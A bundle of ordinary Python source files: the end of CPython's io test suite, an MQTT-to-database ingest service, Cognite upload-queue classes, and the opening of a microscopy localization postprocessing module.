self.open(os_helper.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. 
For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(os_helper.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(os_helper.TESTFN, 'xb') as f: f.write(b"spam") with self.open(os_helper.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' 
code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. 
code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked 
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. 
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = import_helper.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. 
N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. 
test_reentrant_write_buffered = None test_reentrant_write_text = None def load_tests(*args): tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest, PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest, CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest, PyBufferedRandomTest, StatefulIncrementalDecoderTest, CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest, CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest, CSignalsTest, PySignalsTest, ) # Put the namespaces of the IO module we are testing and some useful mock # classes in the __dict__ of each test. mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO, MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead, SlowFlushRawIO) all_members = io.__all__ + ["IncrementalNewlineDecoder"] c_io_ns = {name : getattr(io, name) for name in all_members} py_io_ns = {name : getattr(pyio, name) for name in all_members} globs = globals() c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks) py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks) # Avoid turning open into a bound method. py_io_ns["open"] = pyio.OpenWrapper for test in tests: if test.__name__.startswith("C"): for name, obj in c_io_ns.items(): setattr(test, name, obj) elif test.__name__.startswith("Py"): for name, obj in py_io_ns.items(): setattr(test, name, obj) suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests]) return suite if __name__ == "__main__": unittest.main()
# ---- file: mqtt2db.py ----
#!/usr/bin/python3

from db_ingest import DBIngest
import paho.mqtt.client as mqtt
from threading import Thread, Condition, Timer
from signal import signal, SIGTERM
from configuration import env
import traceback
import json
import os

mqtthost = env["MQTTHOST"]
scenario = env["SCENARIO"]
dbhost = env["DBHOST"]
office = list(map(float, env["OFFICE"].split(",")))


class MQTT2DB(object):
    """Bridge that subscribes to an MQTT topic and bulk-ingests the received
    analytics records into the database via DBIngest.

    Records are buffered in an internal cache by the MQTT callback thread and
    drained by a separate writer thread (todb), so slow DB inserts never block
    the MQTT network loop.
    """

    def __init__(self):
        super(MQTT2DB, self).__init__()
        self._db = DBIngest(host=dbhost, index="analytics", office=office)
        self._cache = []          # records waiting to be ingested
        self._cond = Condition()  # guards _cache and wakes the writer thread
        self._mqtt = mqtt.Client()
        self._mqtt.on_message = self.on_message
        self._mqtt.on_disconnect = self.on_disconnect

    def loop(self, topic="analytics"):
        """Connect to the broker (with a 10s watchdog), start the DB writer
        thread, then block forever processing MQTT messages."""
        print("connecting mqtt", flush=True)
        timer = Timer(10, self._connect_watchdog)
        timer.start()
        while True:
            try:
                self._mqtt.connect(mqtthost)
                break
            except Exception:
                # Broker may not be up yet; keep retrying until the
                # watchdog aborts the process for us.
                pass
        timer.cancel()
        print("mqtt connected", flush=True)
        self._stop = False
        Thread(target=self.todb).start()
        self._mqtt.subscribe(topic)
        self._mqtt.loop_forever()

    def _connect_watchdog(self):
        """Abort the whole process if the broker cannot be reached in time.

        This runs on a Timer thread, where plain exit()/sys.exit() would only
        raise SystemExit in that thread and leave the process running.
        os._exit() terminates the process immediately, which is the intent.
        """
        print("quit due to mqtt timeout", flush=True)
        os._exit(-1)

    def _add1(self, item=None):
        """Append one record to the cache and wake the writer thread.

        Called with item=None purely to force a wake-up (e.g. on disconnect,
        so todb can observe _stop and exit).
        """
        with self._cond:
            if item:
                self._cache.append(item)
            self._cond.notify()

    def stop(self):
        """Disconnect from the broker; loop_forever() then returns."""
        self._mqtt.disconnect()

    def on_disconnect(self, client, userdata, rc):
        # Tell the writer thread to finish, and wake it so it can exit.
        self._stop = True
        self._add1()

    def on_message(self, client, userdata, message):
        """MQTT callback: decode one JSON payload, normalize it, queue it.

        Normalization is best effort: a failure partway through is logged and
        whatever was decoded so far is still queued (original behaviour).  If
        the payload cannot even be parsed, nothing is queued -- previously
        this path raised NameError on the unbound record variable.
        """
        r = None  # stays None if the payload cannot be parsed at all
        try:
            r = json.loads(str(message.payload.decode("utf-8", "ignore")))
            if "tags" in r:
                # Flatten "tags" into the top-level record.
                r.update(r["tags"])
                del r["tags"]
            if ("time" not in r) and ("real_base" in r) and ("timestamp" in r):
                # Both keys are guaranteed present by the guard above, so the
                # old `if "real_base" in r else 0` fallback was dead code.
                r["time"] = int((r["real_base"] + r["timestamp"]) / 1000000)
            if "objects" in r and scenario == "traffic":
                r["nobjects"] = int(len(r["objects"]))
            if "objects" in r and scenario == "stadium":
                r["count"] = {"people": len(r["objects"])}
            if "count" in r:
                r["nobjects"] = int(max([r["count"][k] for k in r["count"]]))
        except Exception:
            print(traceback.format_exc(), flush=True)
        if r is not None:
            self._add1(r)

    def todb(self):
        """Writer thread: drain the cache in bulk whenever signalled, until
        stop() or a broker disconnect sets _stop."""
        while not self._stop:
            with self._cond:
                self._cond.wait()
                bulk = self._cache
                self._cache = []
            if not bulk:
                # Woken just to re-check _stop (e.g. on disconnect);
                # nothing to ingest.
                continue
            try:
                self._db.ingest_bulk(bulk)
            except Exception:
                print(traceback.format_exc(), flush=True)


mqtt2db = MQTT2DB()


def quit_service(signum, sigframe):
    """SIGTERM handler: disconnect so loop_forever() returns cleanly."""
    mqtt2db.stop()


signal(SIGTERM, quit_service)
mqtt2db.loop()
# ---- file: uploader.py ----
# Copyright 2020 Cognite AS # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Module containing upload queue classes. The UploadQueue classes chunks together items and uploads them together to CDF, both to minimize the load on the API, and also to speed up uploading as requests can be slow. Each upload queue comes with some configurable conditions that, when met, automatically triggers an upload. **Note:** You cannot assume that an element is uploaded when it is added to the queue, since the upload may be delayed. To ensure that everything is uploaded you should set the `post_upload_function` callback to verify. For example, for a time series queue you might want to check the latest time stamp, as such (assuming incremental time stamps and using timestamp-value tuples as data point format): .. 
code-block:: python state_store = LocalStateStore("states.json") queue = TimeSeriesUploadQueue( cdf_client=my_cognite_client, post_upload_function=state_store.post_upload_handler(), max_upload_interval=1 ) """ import logging import threading import time from abc import ABC, abstractmethod from datetime import datetime from typing import Any, Callable, Dict, List, Optional, Tuple, Union from retry import retry from cognite.client import CogniteClient from cognite.client.data_classes import Event from cognite.client.data_classes.raw import Row from cognite.client.exceptions import CogniteAPIError, CogniteNotFoundError from ._inner_util import _resolve_log_level from .util import EitherId RETRY_BACKOFF_FACTOR = 1.5 RETRY_MAX_DELAY = 15 RETRY_DELAY = 5 RETRIES = 10 DataPointList = Union[ List[Dict[Union[int, float, datetime], Union[int, float, str]]], List[Tuple[Union[int, float, datetime], Union[int, float, str]]], ] class AbstractUploadQueue(ABC): """ Abstract uploader class. Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of the elements that were uploaded. max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. 
""" def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Any]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): self.cdf_client = cdf_client self.threshold = max_queue_size if max_queue_size is not None else -1 self.upload_queue_size = 0 self.trigger_log_level = _resolve_log_level(trigger_log_level) self.logger = logging.getLogger(__name__) self.thread = threading.Thread(target=self._run, daemon=True, name=thread_name) self.lock = threading.RLock() self.stopping = threading.Event() self.max_upload_interval = max_upload_interval self.post_upload_function = post_upload_function def _check_triggers(self) -> None: """ Check if upload triggers are met, call upload if they are. Called by subclasses. """ if self.upload_queue_size > self.threshold >= 0: self.logger.log( self.trigger_log_level, f"Upload queue reached threshold size {self.upload_queue_size}/{self.threshold}, triggering upload", ) return self.upload() return None def _post_upload(self, uploaded: List[Any]) -> None: """ Perform post_upload_function to uploaded data, if applicable Args: uploaded: List of uploaded data """ if self.post_upload_function is not None: try: self.post_upload_function(uploaded) except Exception as e: logging.getLogger(__name__).exception("Error during upload callback") @abstractmethod def add_to_upload_queue(self, *args) -> None: """ Adds an element to the upload queue. The queue will be uploaded if the queue byte size is larger than the threshold specified in the config. """ @abstractmethod def upload(self) -> None: """ Uploads the queue. """ def _run(self) -> None: """ Internal run method for upload thread """ while not self.stopping.is_set(): try: self.logger.log(self.trigger_log_level, "Triggering scheduled upload") self.upload() except Exception as e: self.logger.error("Unexpected error while uploading: %s. 
Skipping this upload.", str(e)) time.sleep(self.max_upload_interval) def start(self) -> None: """ Start upload thread if max_upload_interval is set, this called the upload method every max_upload_interval seconds. """ if self.max_upload_interval is not None: self.stopping.clear() self.thread.start() def stop(self, ensure_upload: bool = True) -> None: """ Stop upload thread if running, and ensures that the upload queue is empty if ensure_upload is True. Args: ensure_upload (bool): (Optional). Call upload one last time after shutting down thread to ensure empty upload queue. """ self.stopping.set() if ensure_upload: self.upload() class RawUploadQueue(AbstractUploadQueue): """ Upload queue for RAW Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of the rows that were uploaded. max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. """ def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Any]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): # Super sets post_upload and thresholds super().__init__( cdf_client, post_upload_function, max_queue_size, max_upload_interval, trigger_log_level, thread_name ) self.upload_queue: Dict[str, Dict[str, List[Row]]] = dict() def add_to_upload_queue(self, database: str, table: str, raw_row: Row) -> None: """ Adds a row to the upload queue. The queue will be uploaded if the queue size is larger than the threshold specified in the __init__. 
Args: database: The database to upload the Raw object to table: The table to upload the Raw object to raw_row: The row object """ with self.lock: # Ensure that the dicts has correct keys if database not in self.upload_queue: self.upload_queue[database] = dict() if table not in self.upload_queue[database]: self.upload_queue[database][table] = [] # Append row to queue self.upload_queue[database][table].append(raw_row) self.upload_queue_size += 1 self._check_triggers() def upload(self) -> None: """ Trigger an upload of the queue, clears queue afterwards """ with self.lock: for database, tables in self.upload_queue.items(): for table, rows in tables.items(): # Deduplicate # In case of duplicate keys, the first key is preserved, and the last value is preserved. patch: Dict[str, Row] = {r.key: r for r in rows} self._upload_batch(database=database, table=table, patch=list(patch.values())) # Perform post-upload logic if applicable try: self._post_upload(rows) except Exception as e: self.logger.error("Error in upload callback: %s", str(e)) self.upload_queue.clear() self.logger.info(f"Uploaded {self.upload_queue_size} rows in total") self.upload_queue_size = 0 @retry( exceptions=CogniteAPIError, tries=RETRIES, delay=RETRY_DELAY, max_delay=RETRY_MAX_DELAY, backoff=RETRY_BACKOFF_FACTOR, ) def _upload_batch(self, database: str, table: str, patch: List[Row]): # Upload self.cdf_client.raw.rows.insert(db_name=database, table_name=table, row=patch, ensure_parent=True) def __enter__(self) -> "RawUploadQueue": """ Wraps around start method, for use as context manager Returns: self """ self.start() return self def __exit__(self, exc_type, exc_val, exc_tb) -> None: """ Wraps around stop method, for use as context manager Args: exc_type: Exception type exc_val: Exception value exc_tb: Traceback """ self.stop() def __len__(self) -> int: """ The size of the upload queue Returns: Number of elements in queue """ return self.upload_queue_size class TimeSeriesUploadQueue(AbstractUploadQueue): 
""" Upload queue for time series Args: cdf_client: Cognite Data Fusion client to use post_upload_function: A function that will be called after each upload. The function will be given one argument: A list of dicts containing the datapoints that were uploaded (on the same format as the kwargs in datapoints upload in the Cognite SDK). max_queue_size: Maximum size of upload queue. Defaults to no max size. max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop methods). trigger_log_level: Log level to log upload triggers to. thread_name: Thread name of uploader thread. """ def __init__( self, cdf_client: CogniteClient, post_upload_function: Optional[Callable[[List[Dict[str, Union[str, DataPointList]]]], None]] = None, max_queue_size: Optional[int] = None, max_upload_interval: Optional[int] = None, trigger_log_level: str = "DEBUG", thread_name: Optional[str] = None, ): # Super sets post_upload and threshold super().__init__( cdf_client, post_upload_function, max_queue_size, max_upload_interval, trigger_log_level, thread_name ) self.upload_queue: Dict[EitherId, DataPointList] = dict() def add_to_upload_queue(self, *, id: int = None, external_id: str = None, datapoints: DataPointList = []) -> None: """ Add data points to upload queue. The queue will be uploaded if the queue size is larger than the threshold specified in the __init__. Args: id: Internal ID of time series. Either this or external_id must be set. external_id: External ID of time series. Either this or external_id must be set. 
            datapoints: List of data points to add
        """
        either_id = EitherId(id=id, external_id=external_id)

        with self.lock:
            if either_id not in self.upload_queue:
                self.upload_queue[either_id] = []

            self.upload_queue[either_id].extend(datapoints)
            self.upload_queue_size += len(datapoints)

            self._check_triggers()

    def upload(self) -> None:
        """
        Trigger an upload of the queue, clears queue afterwards
        """
        # NOTE(review): this emptiness check happens outside the lock. Worst case is a harmless
        # extra no-op upload or one skipped cycle; the actual queue mutation is lock-protected below.
        if len(self.upload_queue) == 0:
            return

        with self.lock:
            upload_this = self._upload_batch(
                [
                    {either_id.type(): either_id.content(), "datapoints": datapoints}
                    for either_id, datapoints in self.upload_queue.items()
                    if len(datapoints) > 0
                ]
            )

            try:
                self._post_upload(upload_this)
            except Exception as e:
                # A failing user callback must not prevent the queue from being cleared
                self.logger.error("Error in upload callback: %s", str(e))

            self.upload_queue.clear()
            self.upload_queue_size = 0

    @retry(
        exceptions=CogniteAPIError,
        tries=RETRIES,
        delay=RETRY_DELAY,
        max_delay=RETRY_MAX_DELAY,
        backoff=RETRY_BACKOFF_FACTOR,
    )
    def _upload_batch(self, upload_this: List[Dict]) -> List[Dict]:
        """
        Insert the given datapoint dicts into CDF (retried on CogniteAPIError).

        If some target time series do not exist, those entries are dropped and the
        remaining entries are re-inserted.

        Returns:
            The list of entries that were (eventually) uploaded.
        """
        if len(upload_this) == 0:
            return upload_this

        try:
            self.cdf_client.datapoints.insert_multiple(upload_this)
        except CogniteNotFoundError as ex:
            self.logger.error("Could not upload data points to %s: %s", str(ex.not_found), str(ex))

            # Get IDs of time series that exists, but failed because of the non-existing time series
            retry_these = [EitherId(**id_dict) for id_dict in ex.failed if id_dict not in ex.not_found]

            # Remove entries with non-existing time series from upload queue
            upload_this = [
                entry
                for entry in upload_this
                if EitherId(id=entry.get("id"), external_id=entry.get("externalId")) in retry_these
            ]

            # Upload remaining
            self.cdf_client.datapoints.insert_multiple(upload_this)

        return upload_this

    def __enter__(self) -> "TimeSeriesUploadQueue":
        """
        Wraps around start method, for use as context manager

        Returns:
            self
        """
        self.start()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb) -> None:
        """
        Wraps around stop method, for use as context manager

        Args:
            exc_type: Exception type
            exc_val:
                Exception value
            exc_tb: Traceback
        """
        self.stop()

    def __len__(self) -> int:
        """
        The size of the upload queue

        Returns:
            Number of data points in queue
        """
        return self.upload_queue_size


class EventUploadQueue(AbstractUploadQueue):
    """
    Upload queue for events

    Args:
        cdf_client: Cognite Data Fusion client to use
        post_upload_function: A function that will be called after each upload. The function will be given one
            argument: A list of the events that were uploaded.
        max_queue_size: Maximum size of upload queue. Defaults to no max size.
        max_upload_interval: Automatically trigger an upload each m seconds when run as a thread (use start/stop
            methods).
        trigger_log_level: Log level to log upload triggers to.
        thread_name: Thread name of uploader thread.
    """

    def __init__(
        self,
        cdf_client: CogniteClient,
        post_upload_function: Optional[Callable[[List[Event]], None]] = None,
        max_queue_size: Optional[int] = None,
        max_upload_interval: Optional[int] = None,
        trigger_log_level: str = "DEBUG",
        thread_name: Optional[str] = None,
    ):
        # Super sets post_upload and threshold
        super().__init__(
            cdf_client, post_upload_function, max_queue_size, max_upload_interval, trigger_log_level, thread_name
        )

        # Pending events, uploaded and cleared as one batch
        self.upload_queue: List[Event] = []

    def add_to_upload_queue(self, event: Event) -> None:
        """
        Add event to upload queue. The queue will be uploaded if the queue size is larger than the threshold
        specified in the __init__.
        Args:
            event: Event to add
        """
        with self.lock:
            self.upload_queue.append(event)
            self.upload_queue_size += 1
            self._check_triggers()

    def upload(self) -> None:
        """
        Trigger an upload of the queue, clears queue afterwards
        """
        # NOTE(review): emptiness check is outside the lock (same benign pattern as the other queues)
        if len(self.upload_queue) == 0:
            return

        with self.lock:
            self._upload_batch()

            try:
                self._post_upload(self.upload_queue)
            except Exception as e:
                # A failing user callback must not prevent the queue from being cleared
                self.logger.error("Error in upload callback: %s", str(e))

            self.upload_queue.clear()
            self.upload_queue_size = 0

    @retry(
        exceptions=CogniteAPIError,
        tries=RETRIES,
        delay=RETRY_DELAY,
        max_delay=RETRY_MAX_DELAY,
        backoff=RETRY_BACKOFF_FACTOR,
    )
    def _upload_batch(self) -> None:
        """Create all queued events in CDF in one call (retried on CogniteAPIError)."""
        self.cdf_client.events.create([e for e in self.upload_queue])

    def __enter__(self) -> "EventUploadQueue":
        """
        Wraps around start method, for use as context manager

        Returns:
            self
        """
        self.start()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb) -> None:
        """
        Wraps around stop method, for use as context manager

        Args:
            exc_type: Exception type
            exc_val: Exception value
            exc_tb: Traceback
        """
        self.stop()

    def __len__(self) -> int:
        """
        The size of the upload queue

        Returns:
            Number of events in queue
        """
        return self.upload_queue_size
postprocess.py
""" gui/postprocess ~~~~~~~~~~~~~~~~~~~~ Data analysis of localization lists :author: Joerg Schnitzbauer, 2015 :copyright: Copyright (c) 2015 Jungmann Lab, Max Planck Institute of Biochemistry """ import numpy as _np import numba as _numba from sklearn.cluster import DBSCAN as _DBSCAN from scipy import interpolate as _interpolate from scipy.special import iv as _iv from scipy.spatial import distance from scipy.spatial import ConvexHull from concurrent.futures import ThreadPoolExecutor as _ThreadPoolExecutor import multiprocessing as _multiprocessing import matplotlib.pyplot as _plt import itertools as _itertools import lmfit as _lmfit from collections import OrderedDict as _OrderedDict from . import lib as _lib from . import render as _render from . import imageprocess as _imageprocess from threading import Thread as _Thread import time as _time from tqdm import tqdm as _tqdm from numpy.lib.recfunctions import stack_arrays def get_index_blocks(locs, info, size, callback=None): locs = _lib.ensure_sanity(locs, info) # Sort locs by indices x_index = _np.uint32(locs.x / size) y_index = _np.uint32(locs.y / size) sort_indices = _np.lexsort([x_index, y_index]) locs = locs[sort_indices] x_index = x_index[sort_indices] y_index = y_index[sort_indices] # Allocate block info arrays n_blocks_y, n_blocks_x = index_blocks_shape(info, size) block_starts = _np.zeros((n_blocks_y, n_blocks_x), dtype=_np.uint32) block_ends = _np.zeros((n_blocks_y, n_blocks_x), dtype=_np.uint32) K, L = block_starts.shape # Fill in block starts and ends # We are running this in a thread with a nogil numba function. This helps updating a potential GUI with the callback. 
    if callback is not None:
        callback(0)
        counter = [0]  # single-element list: mutable progress cell shared with the worker thread
    else:
        counter = None
    thread = _Thread(target=_fill_index_blocks, args=(block_starts, block_ends, x_index, y_index, counter))
    thread.start()
    if callback is not None:
        # Poll the shared counter while the nogil numba worker fills the blocks
        while counter[0] < K:
            callback(counter[0])
            _time.sleep(0.1)
    thread.join()
    if callback is not None:
        callback(counter[0])
    return locs, size, x_index, y_index, block_starts, block_ends, K, L


def index_blocks_shape(info, size):
    '''
    Returns the shape of the index grid, given the movie and grid sizes
    '''
    n_blocks_x = int(_np.ceil(info[0]['Width'] / size))
    n_blocks_y = int(_np.ceil(info[0]['Height'] / size))
    return n_blocks_y, n_blocks_x


@_numba.jit(nopython=True, nogil=True)
def n_block_locs_at(x, y, size, K, L, block_starts, block_ends):
    """Count localizations in the 3x3 block neighborhood around point (x, y)."""
    x_index = _np.uint32(x / size)
    y_index = _np.uint32(y / size)
    n_block_locs = 0
    for k in range(y_index - 1, y_index + 2):
        # NOTE(review): `0 < k < K` excludes block row/column 0 — looks like it should be
        # `0 <= k` (but uint32 underflow of y_index - 1 complicates this) — TODO confirm upstream.
        if 0 < k < K:
            for l in range(x_index - 1, x_index + 2):
                if 0 < l < L:
                    n_block_locs += block_ends[k, l] - block_starts[k, l]
    return n_block_locs


def get_block_locs_at(x, y, index_blocks):
    """Return the localizations in the 3x3 block neighborhood of point (x, y)."""
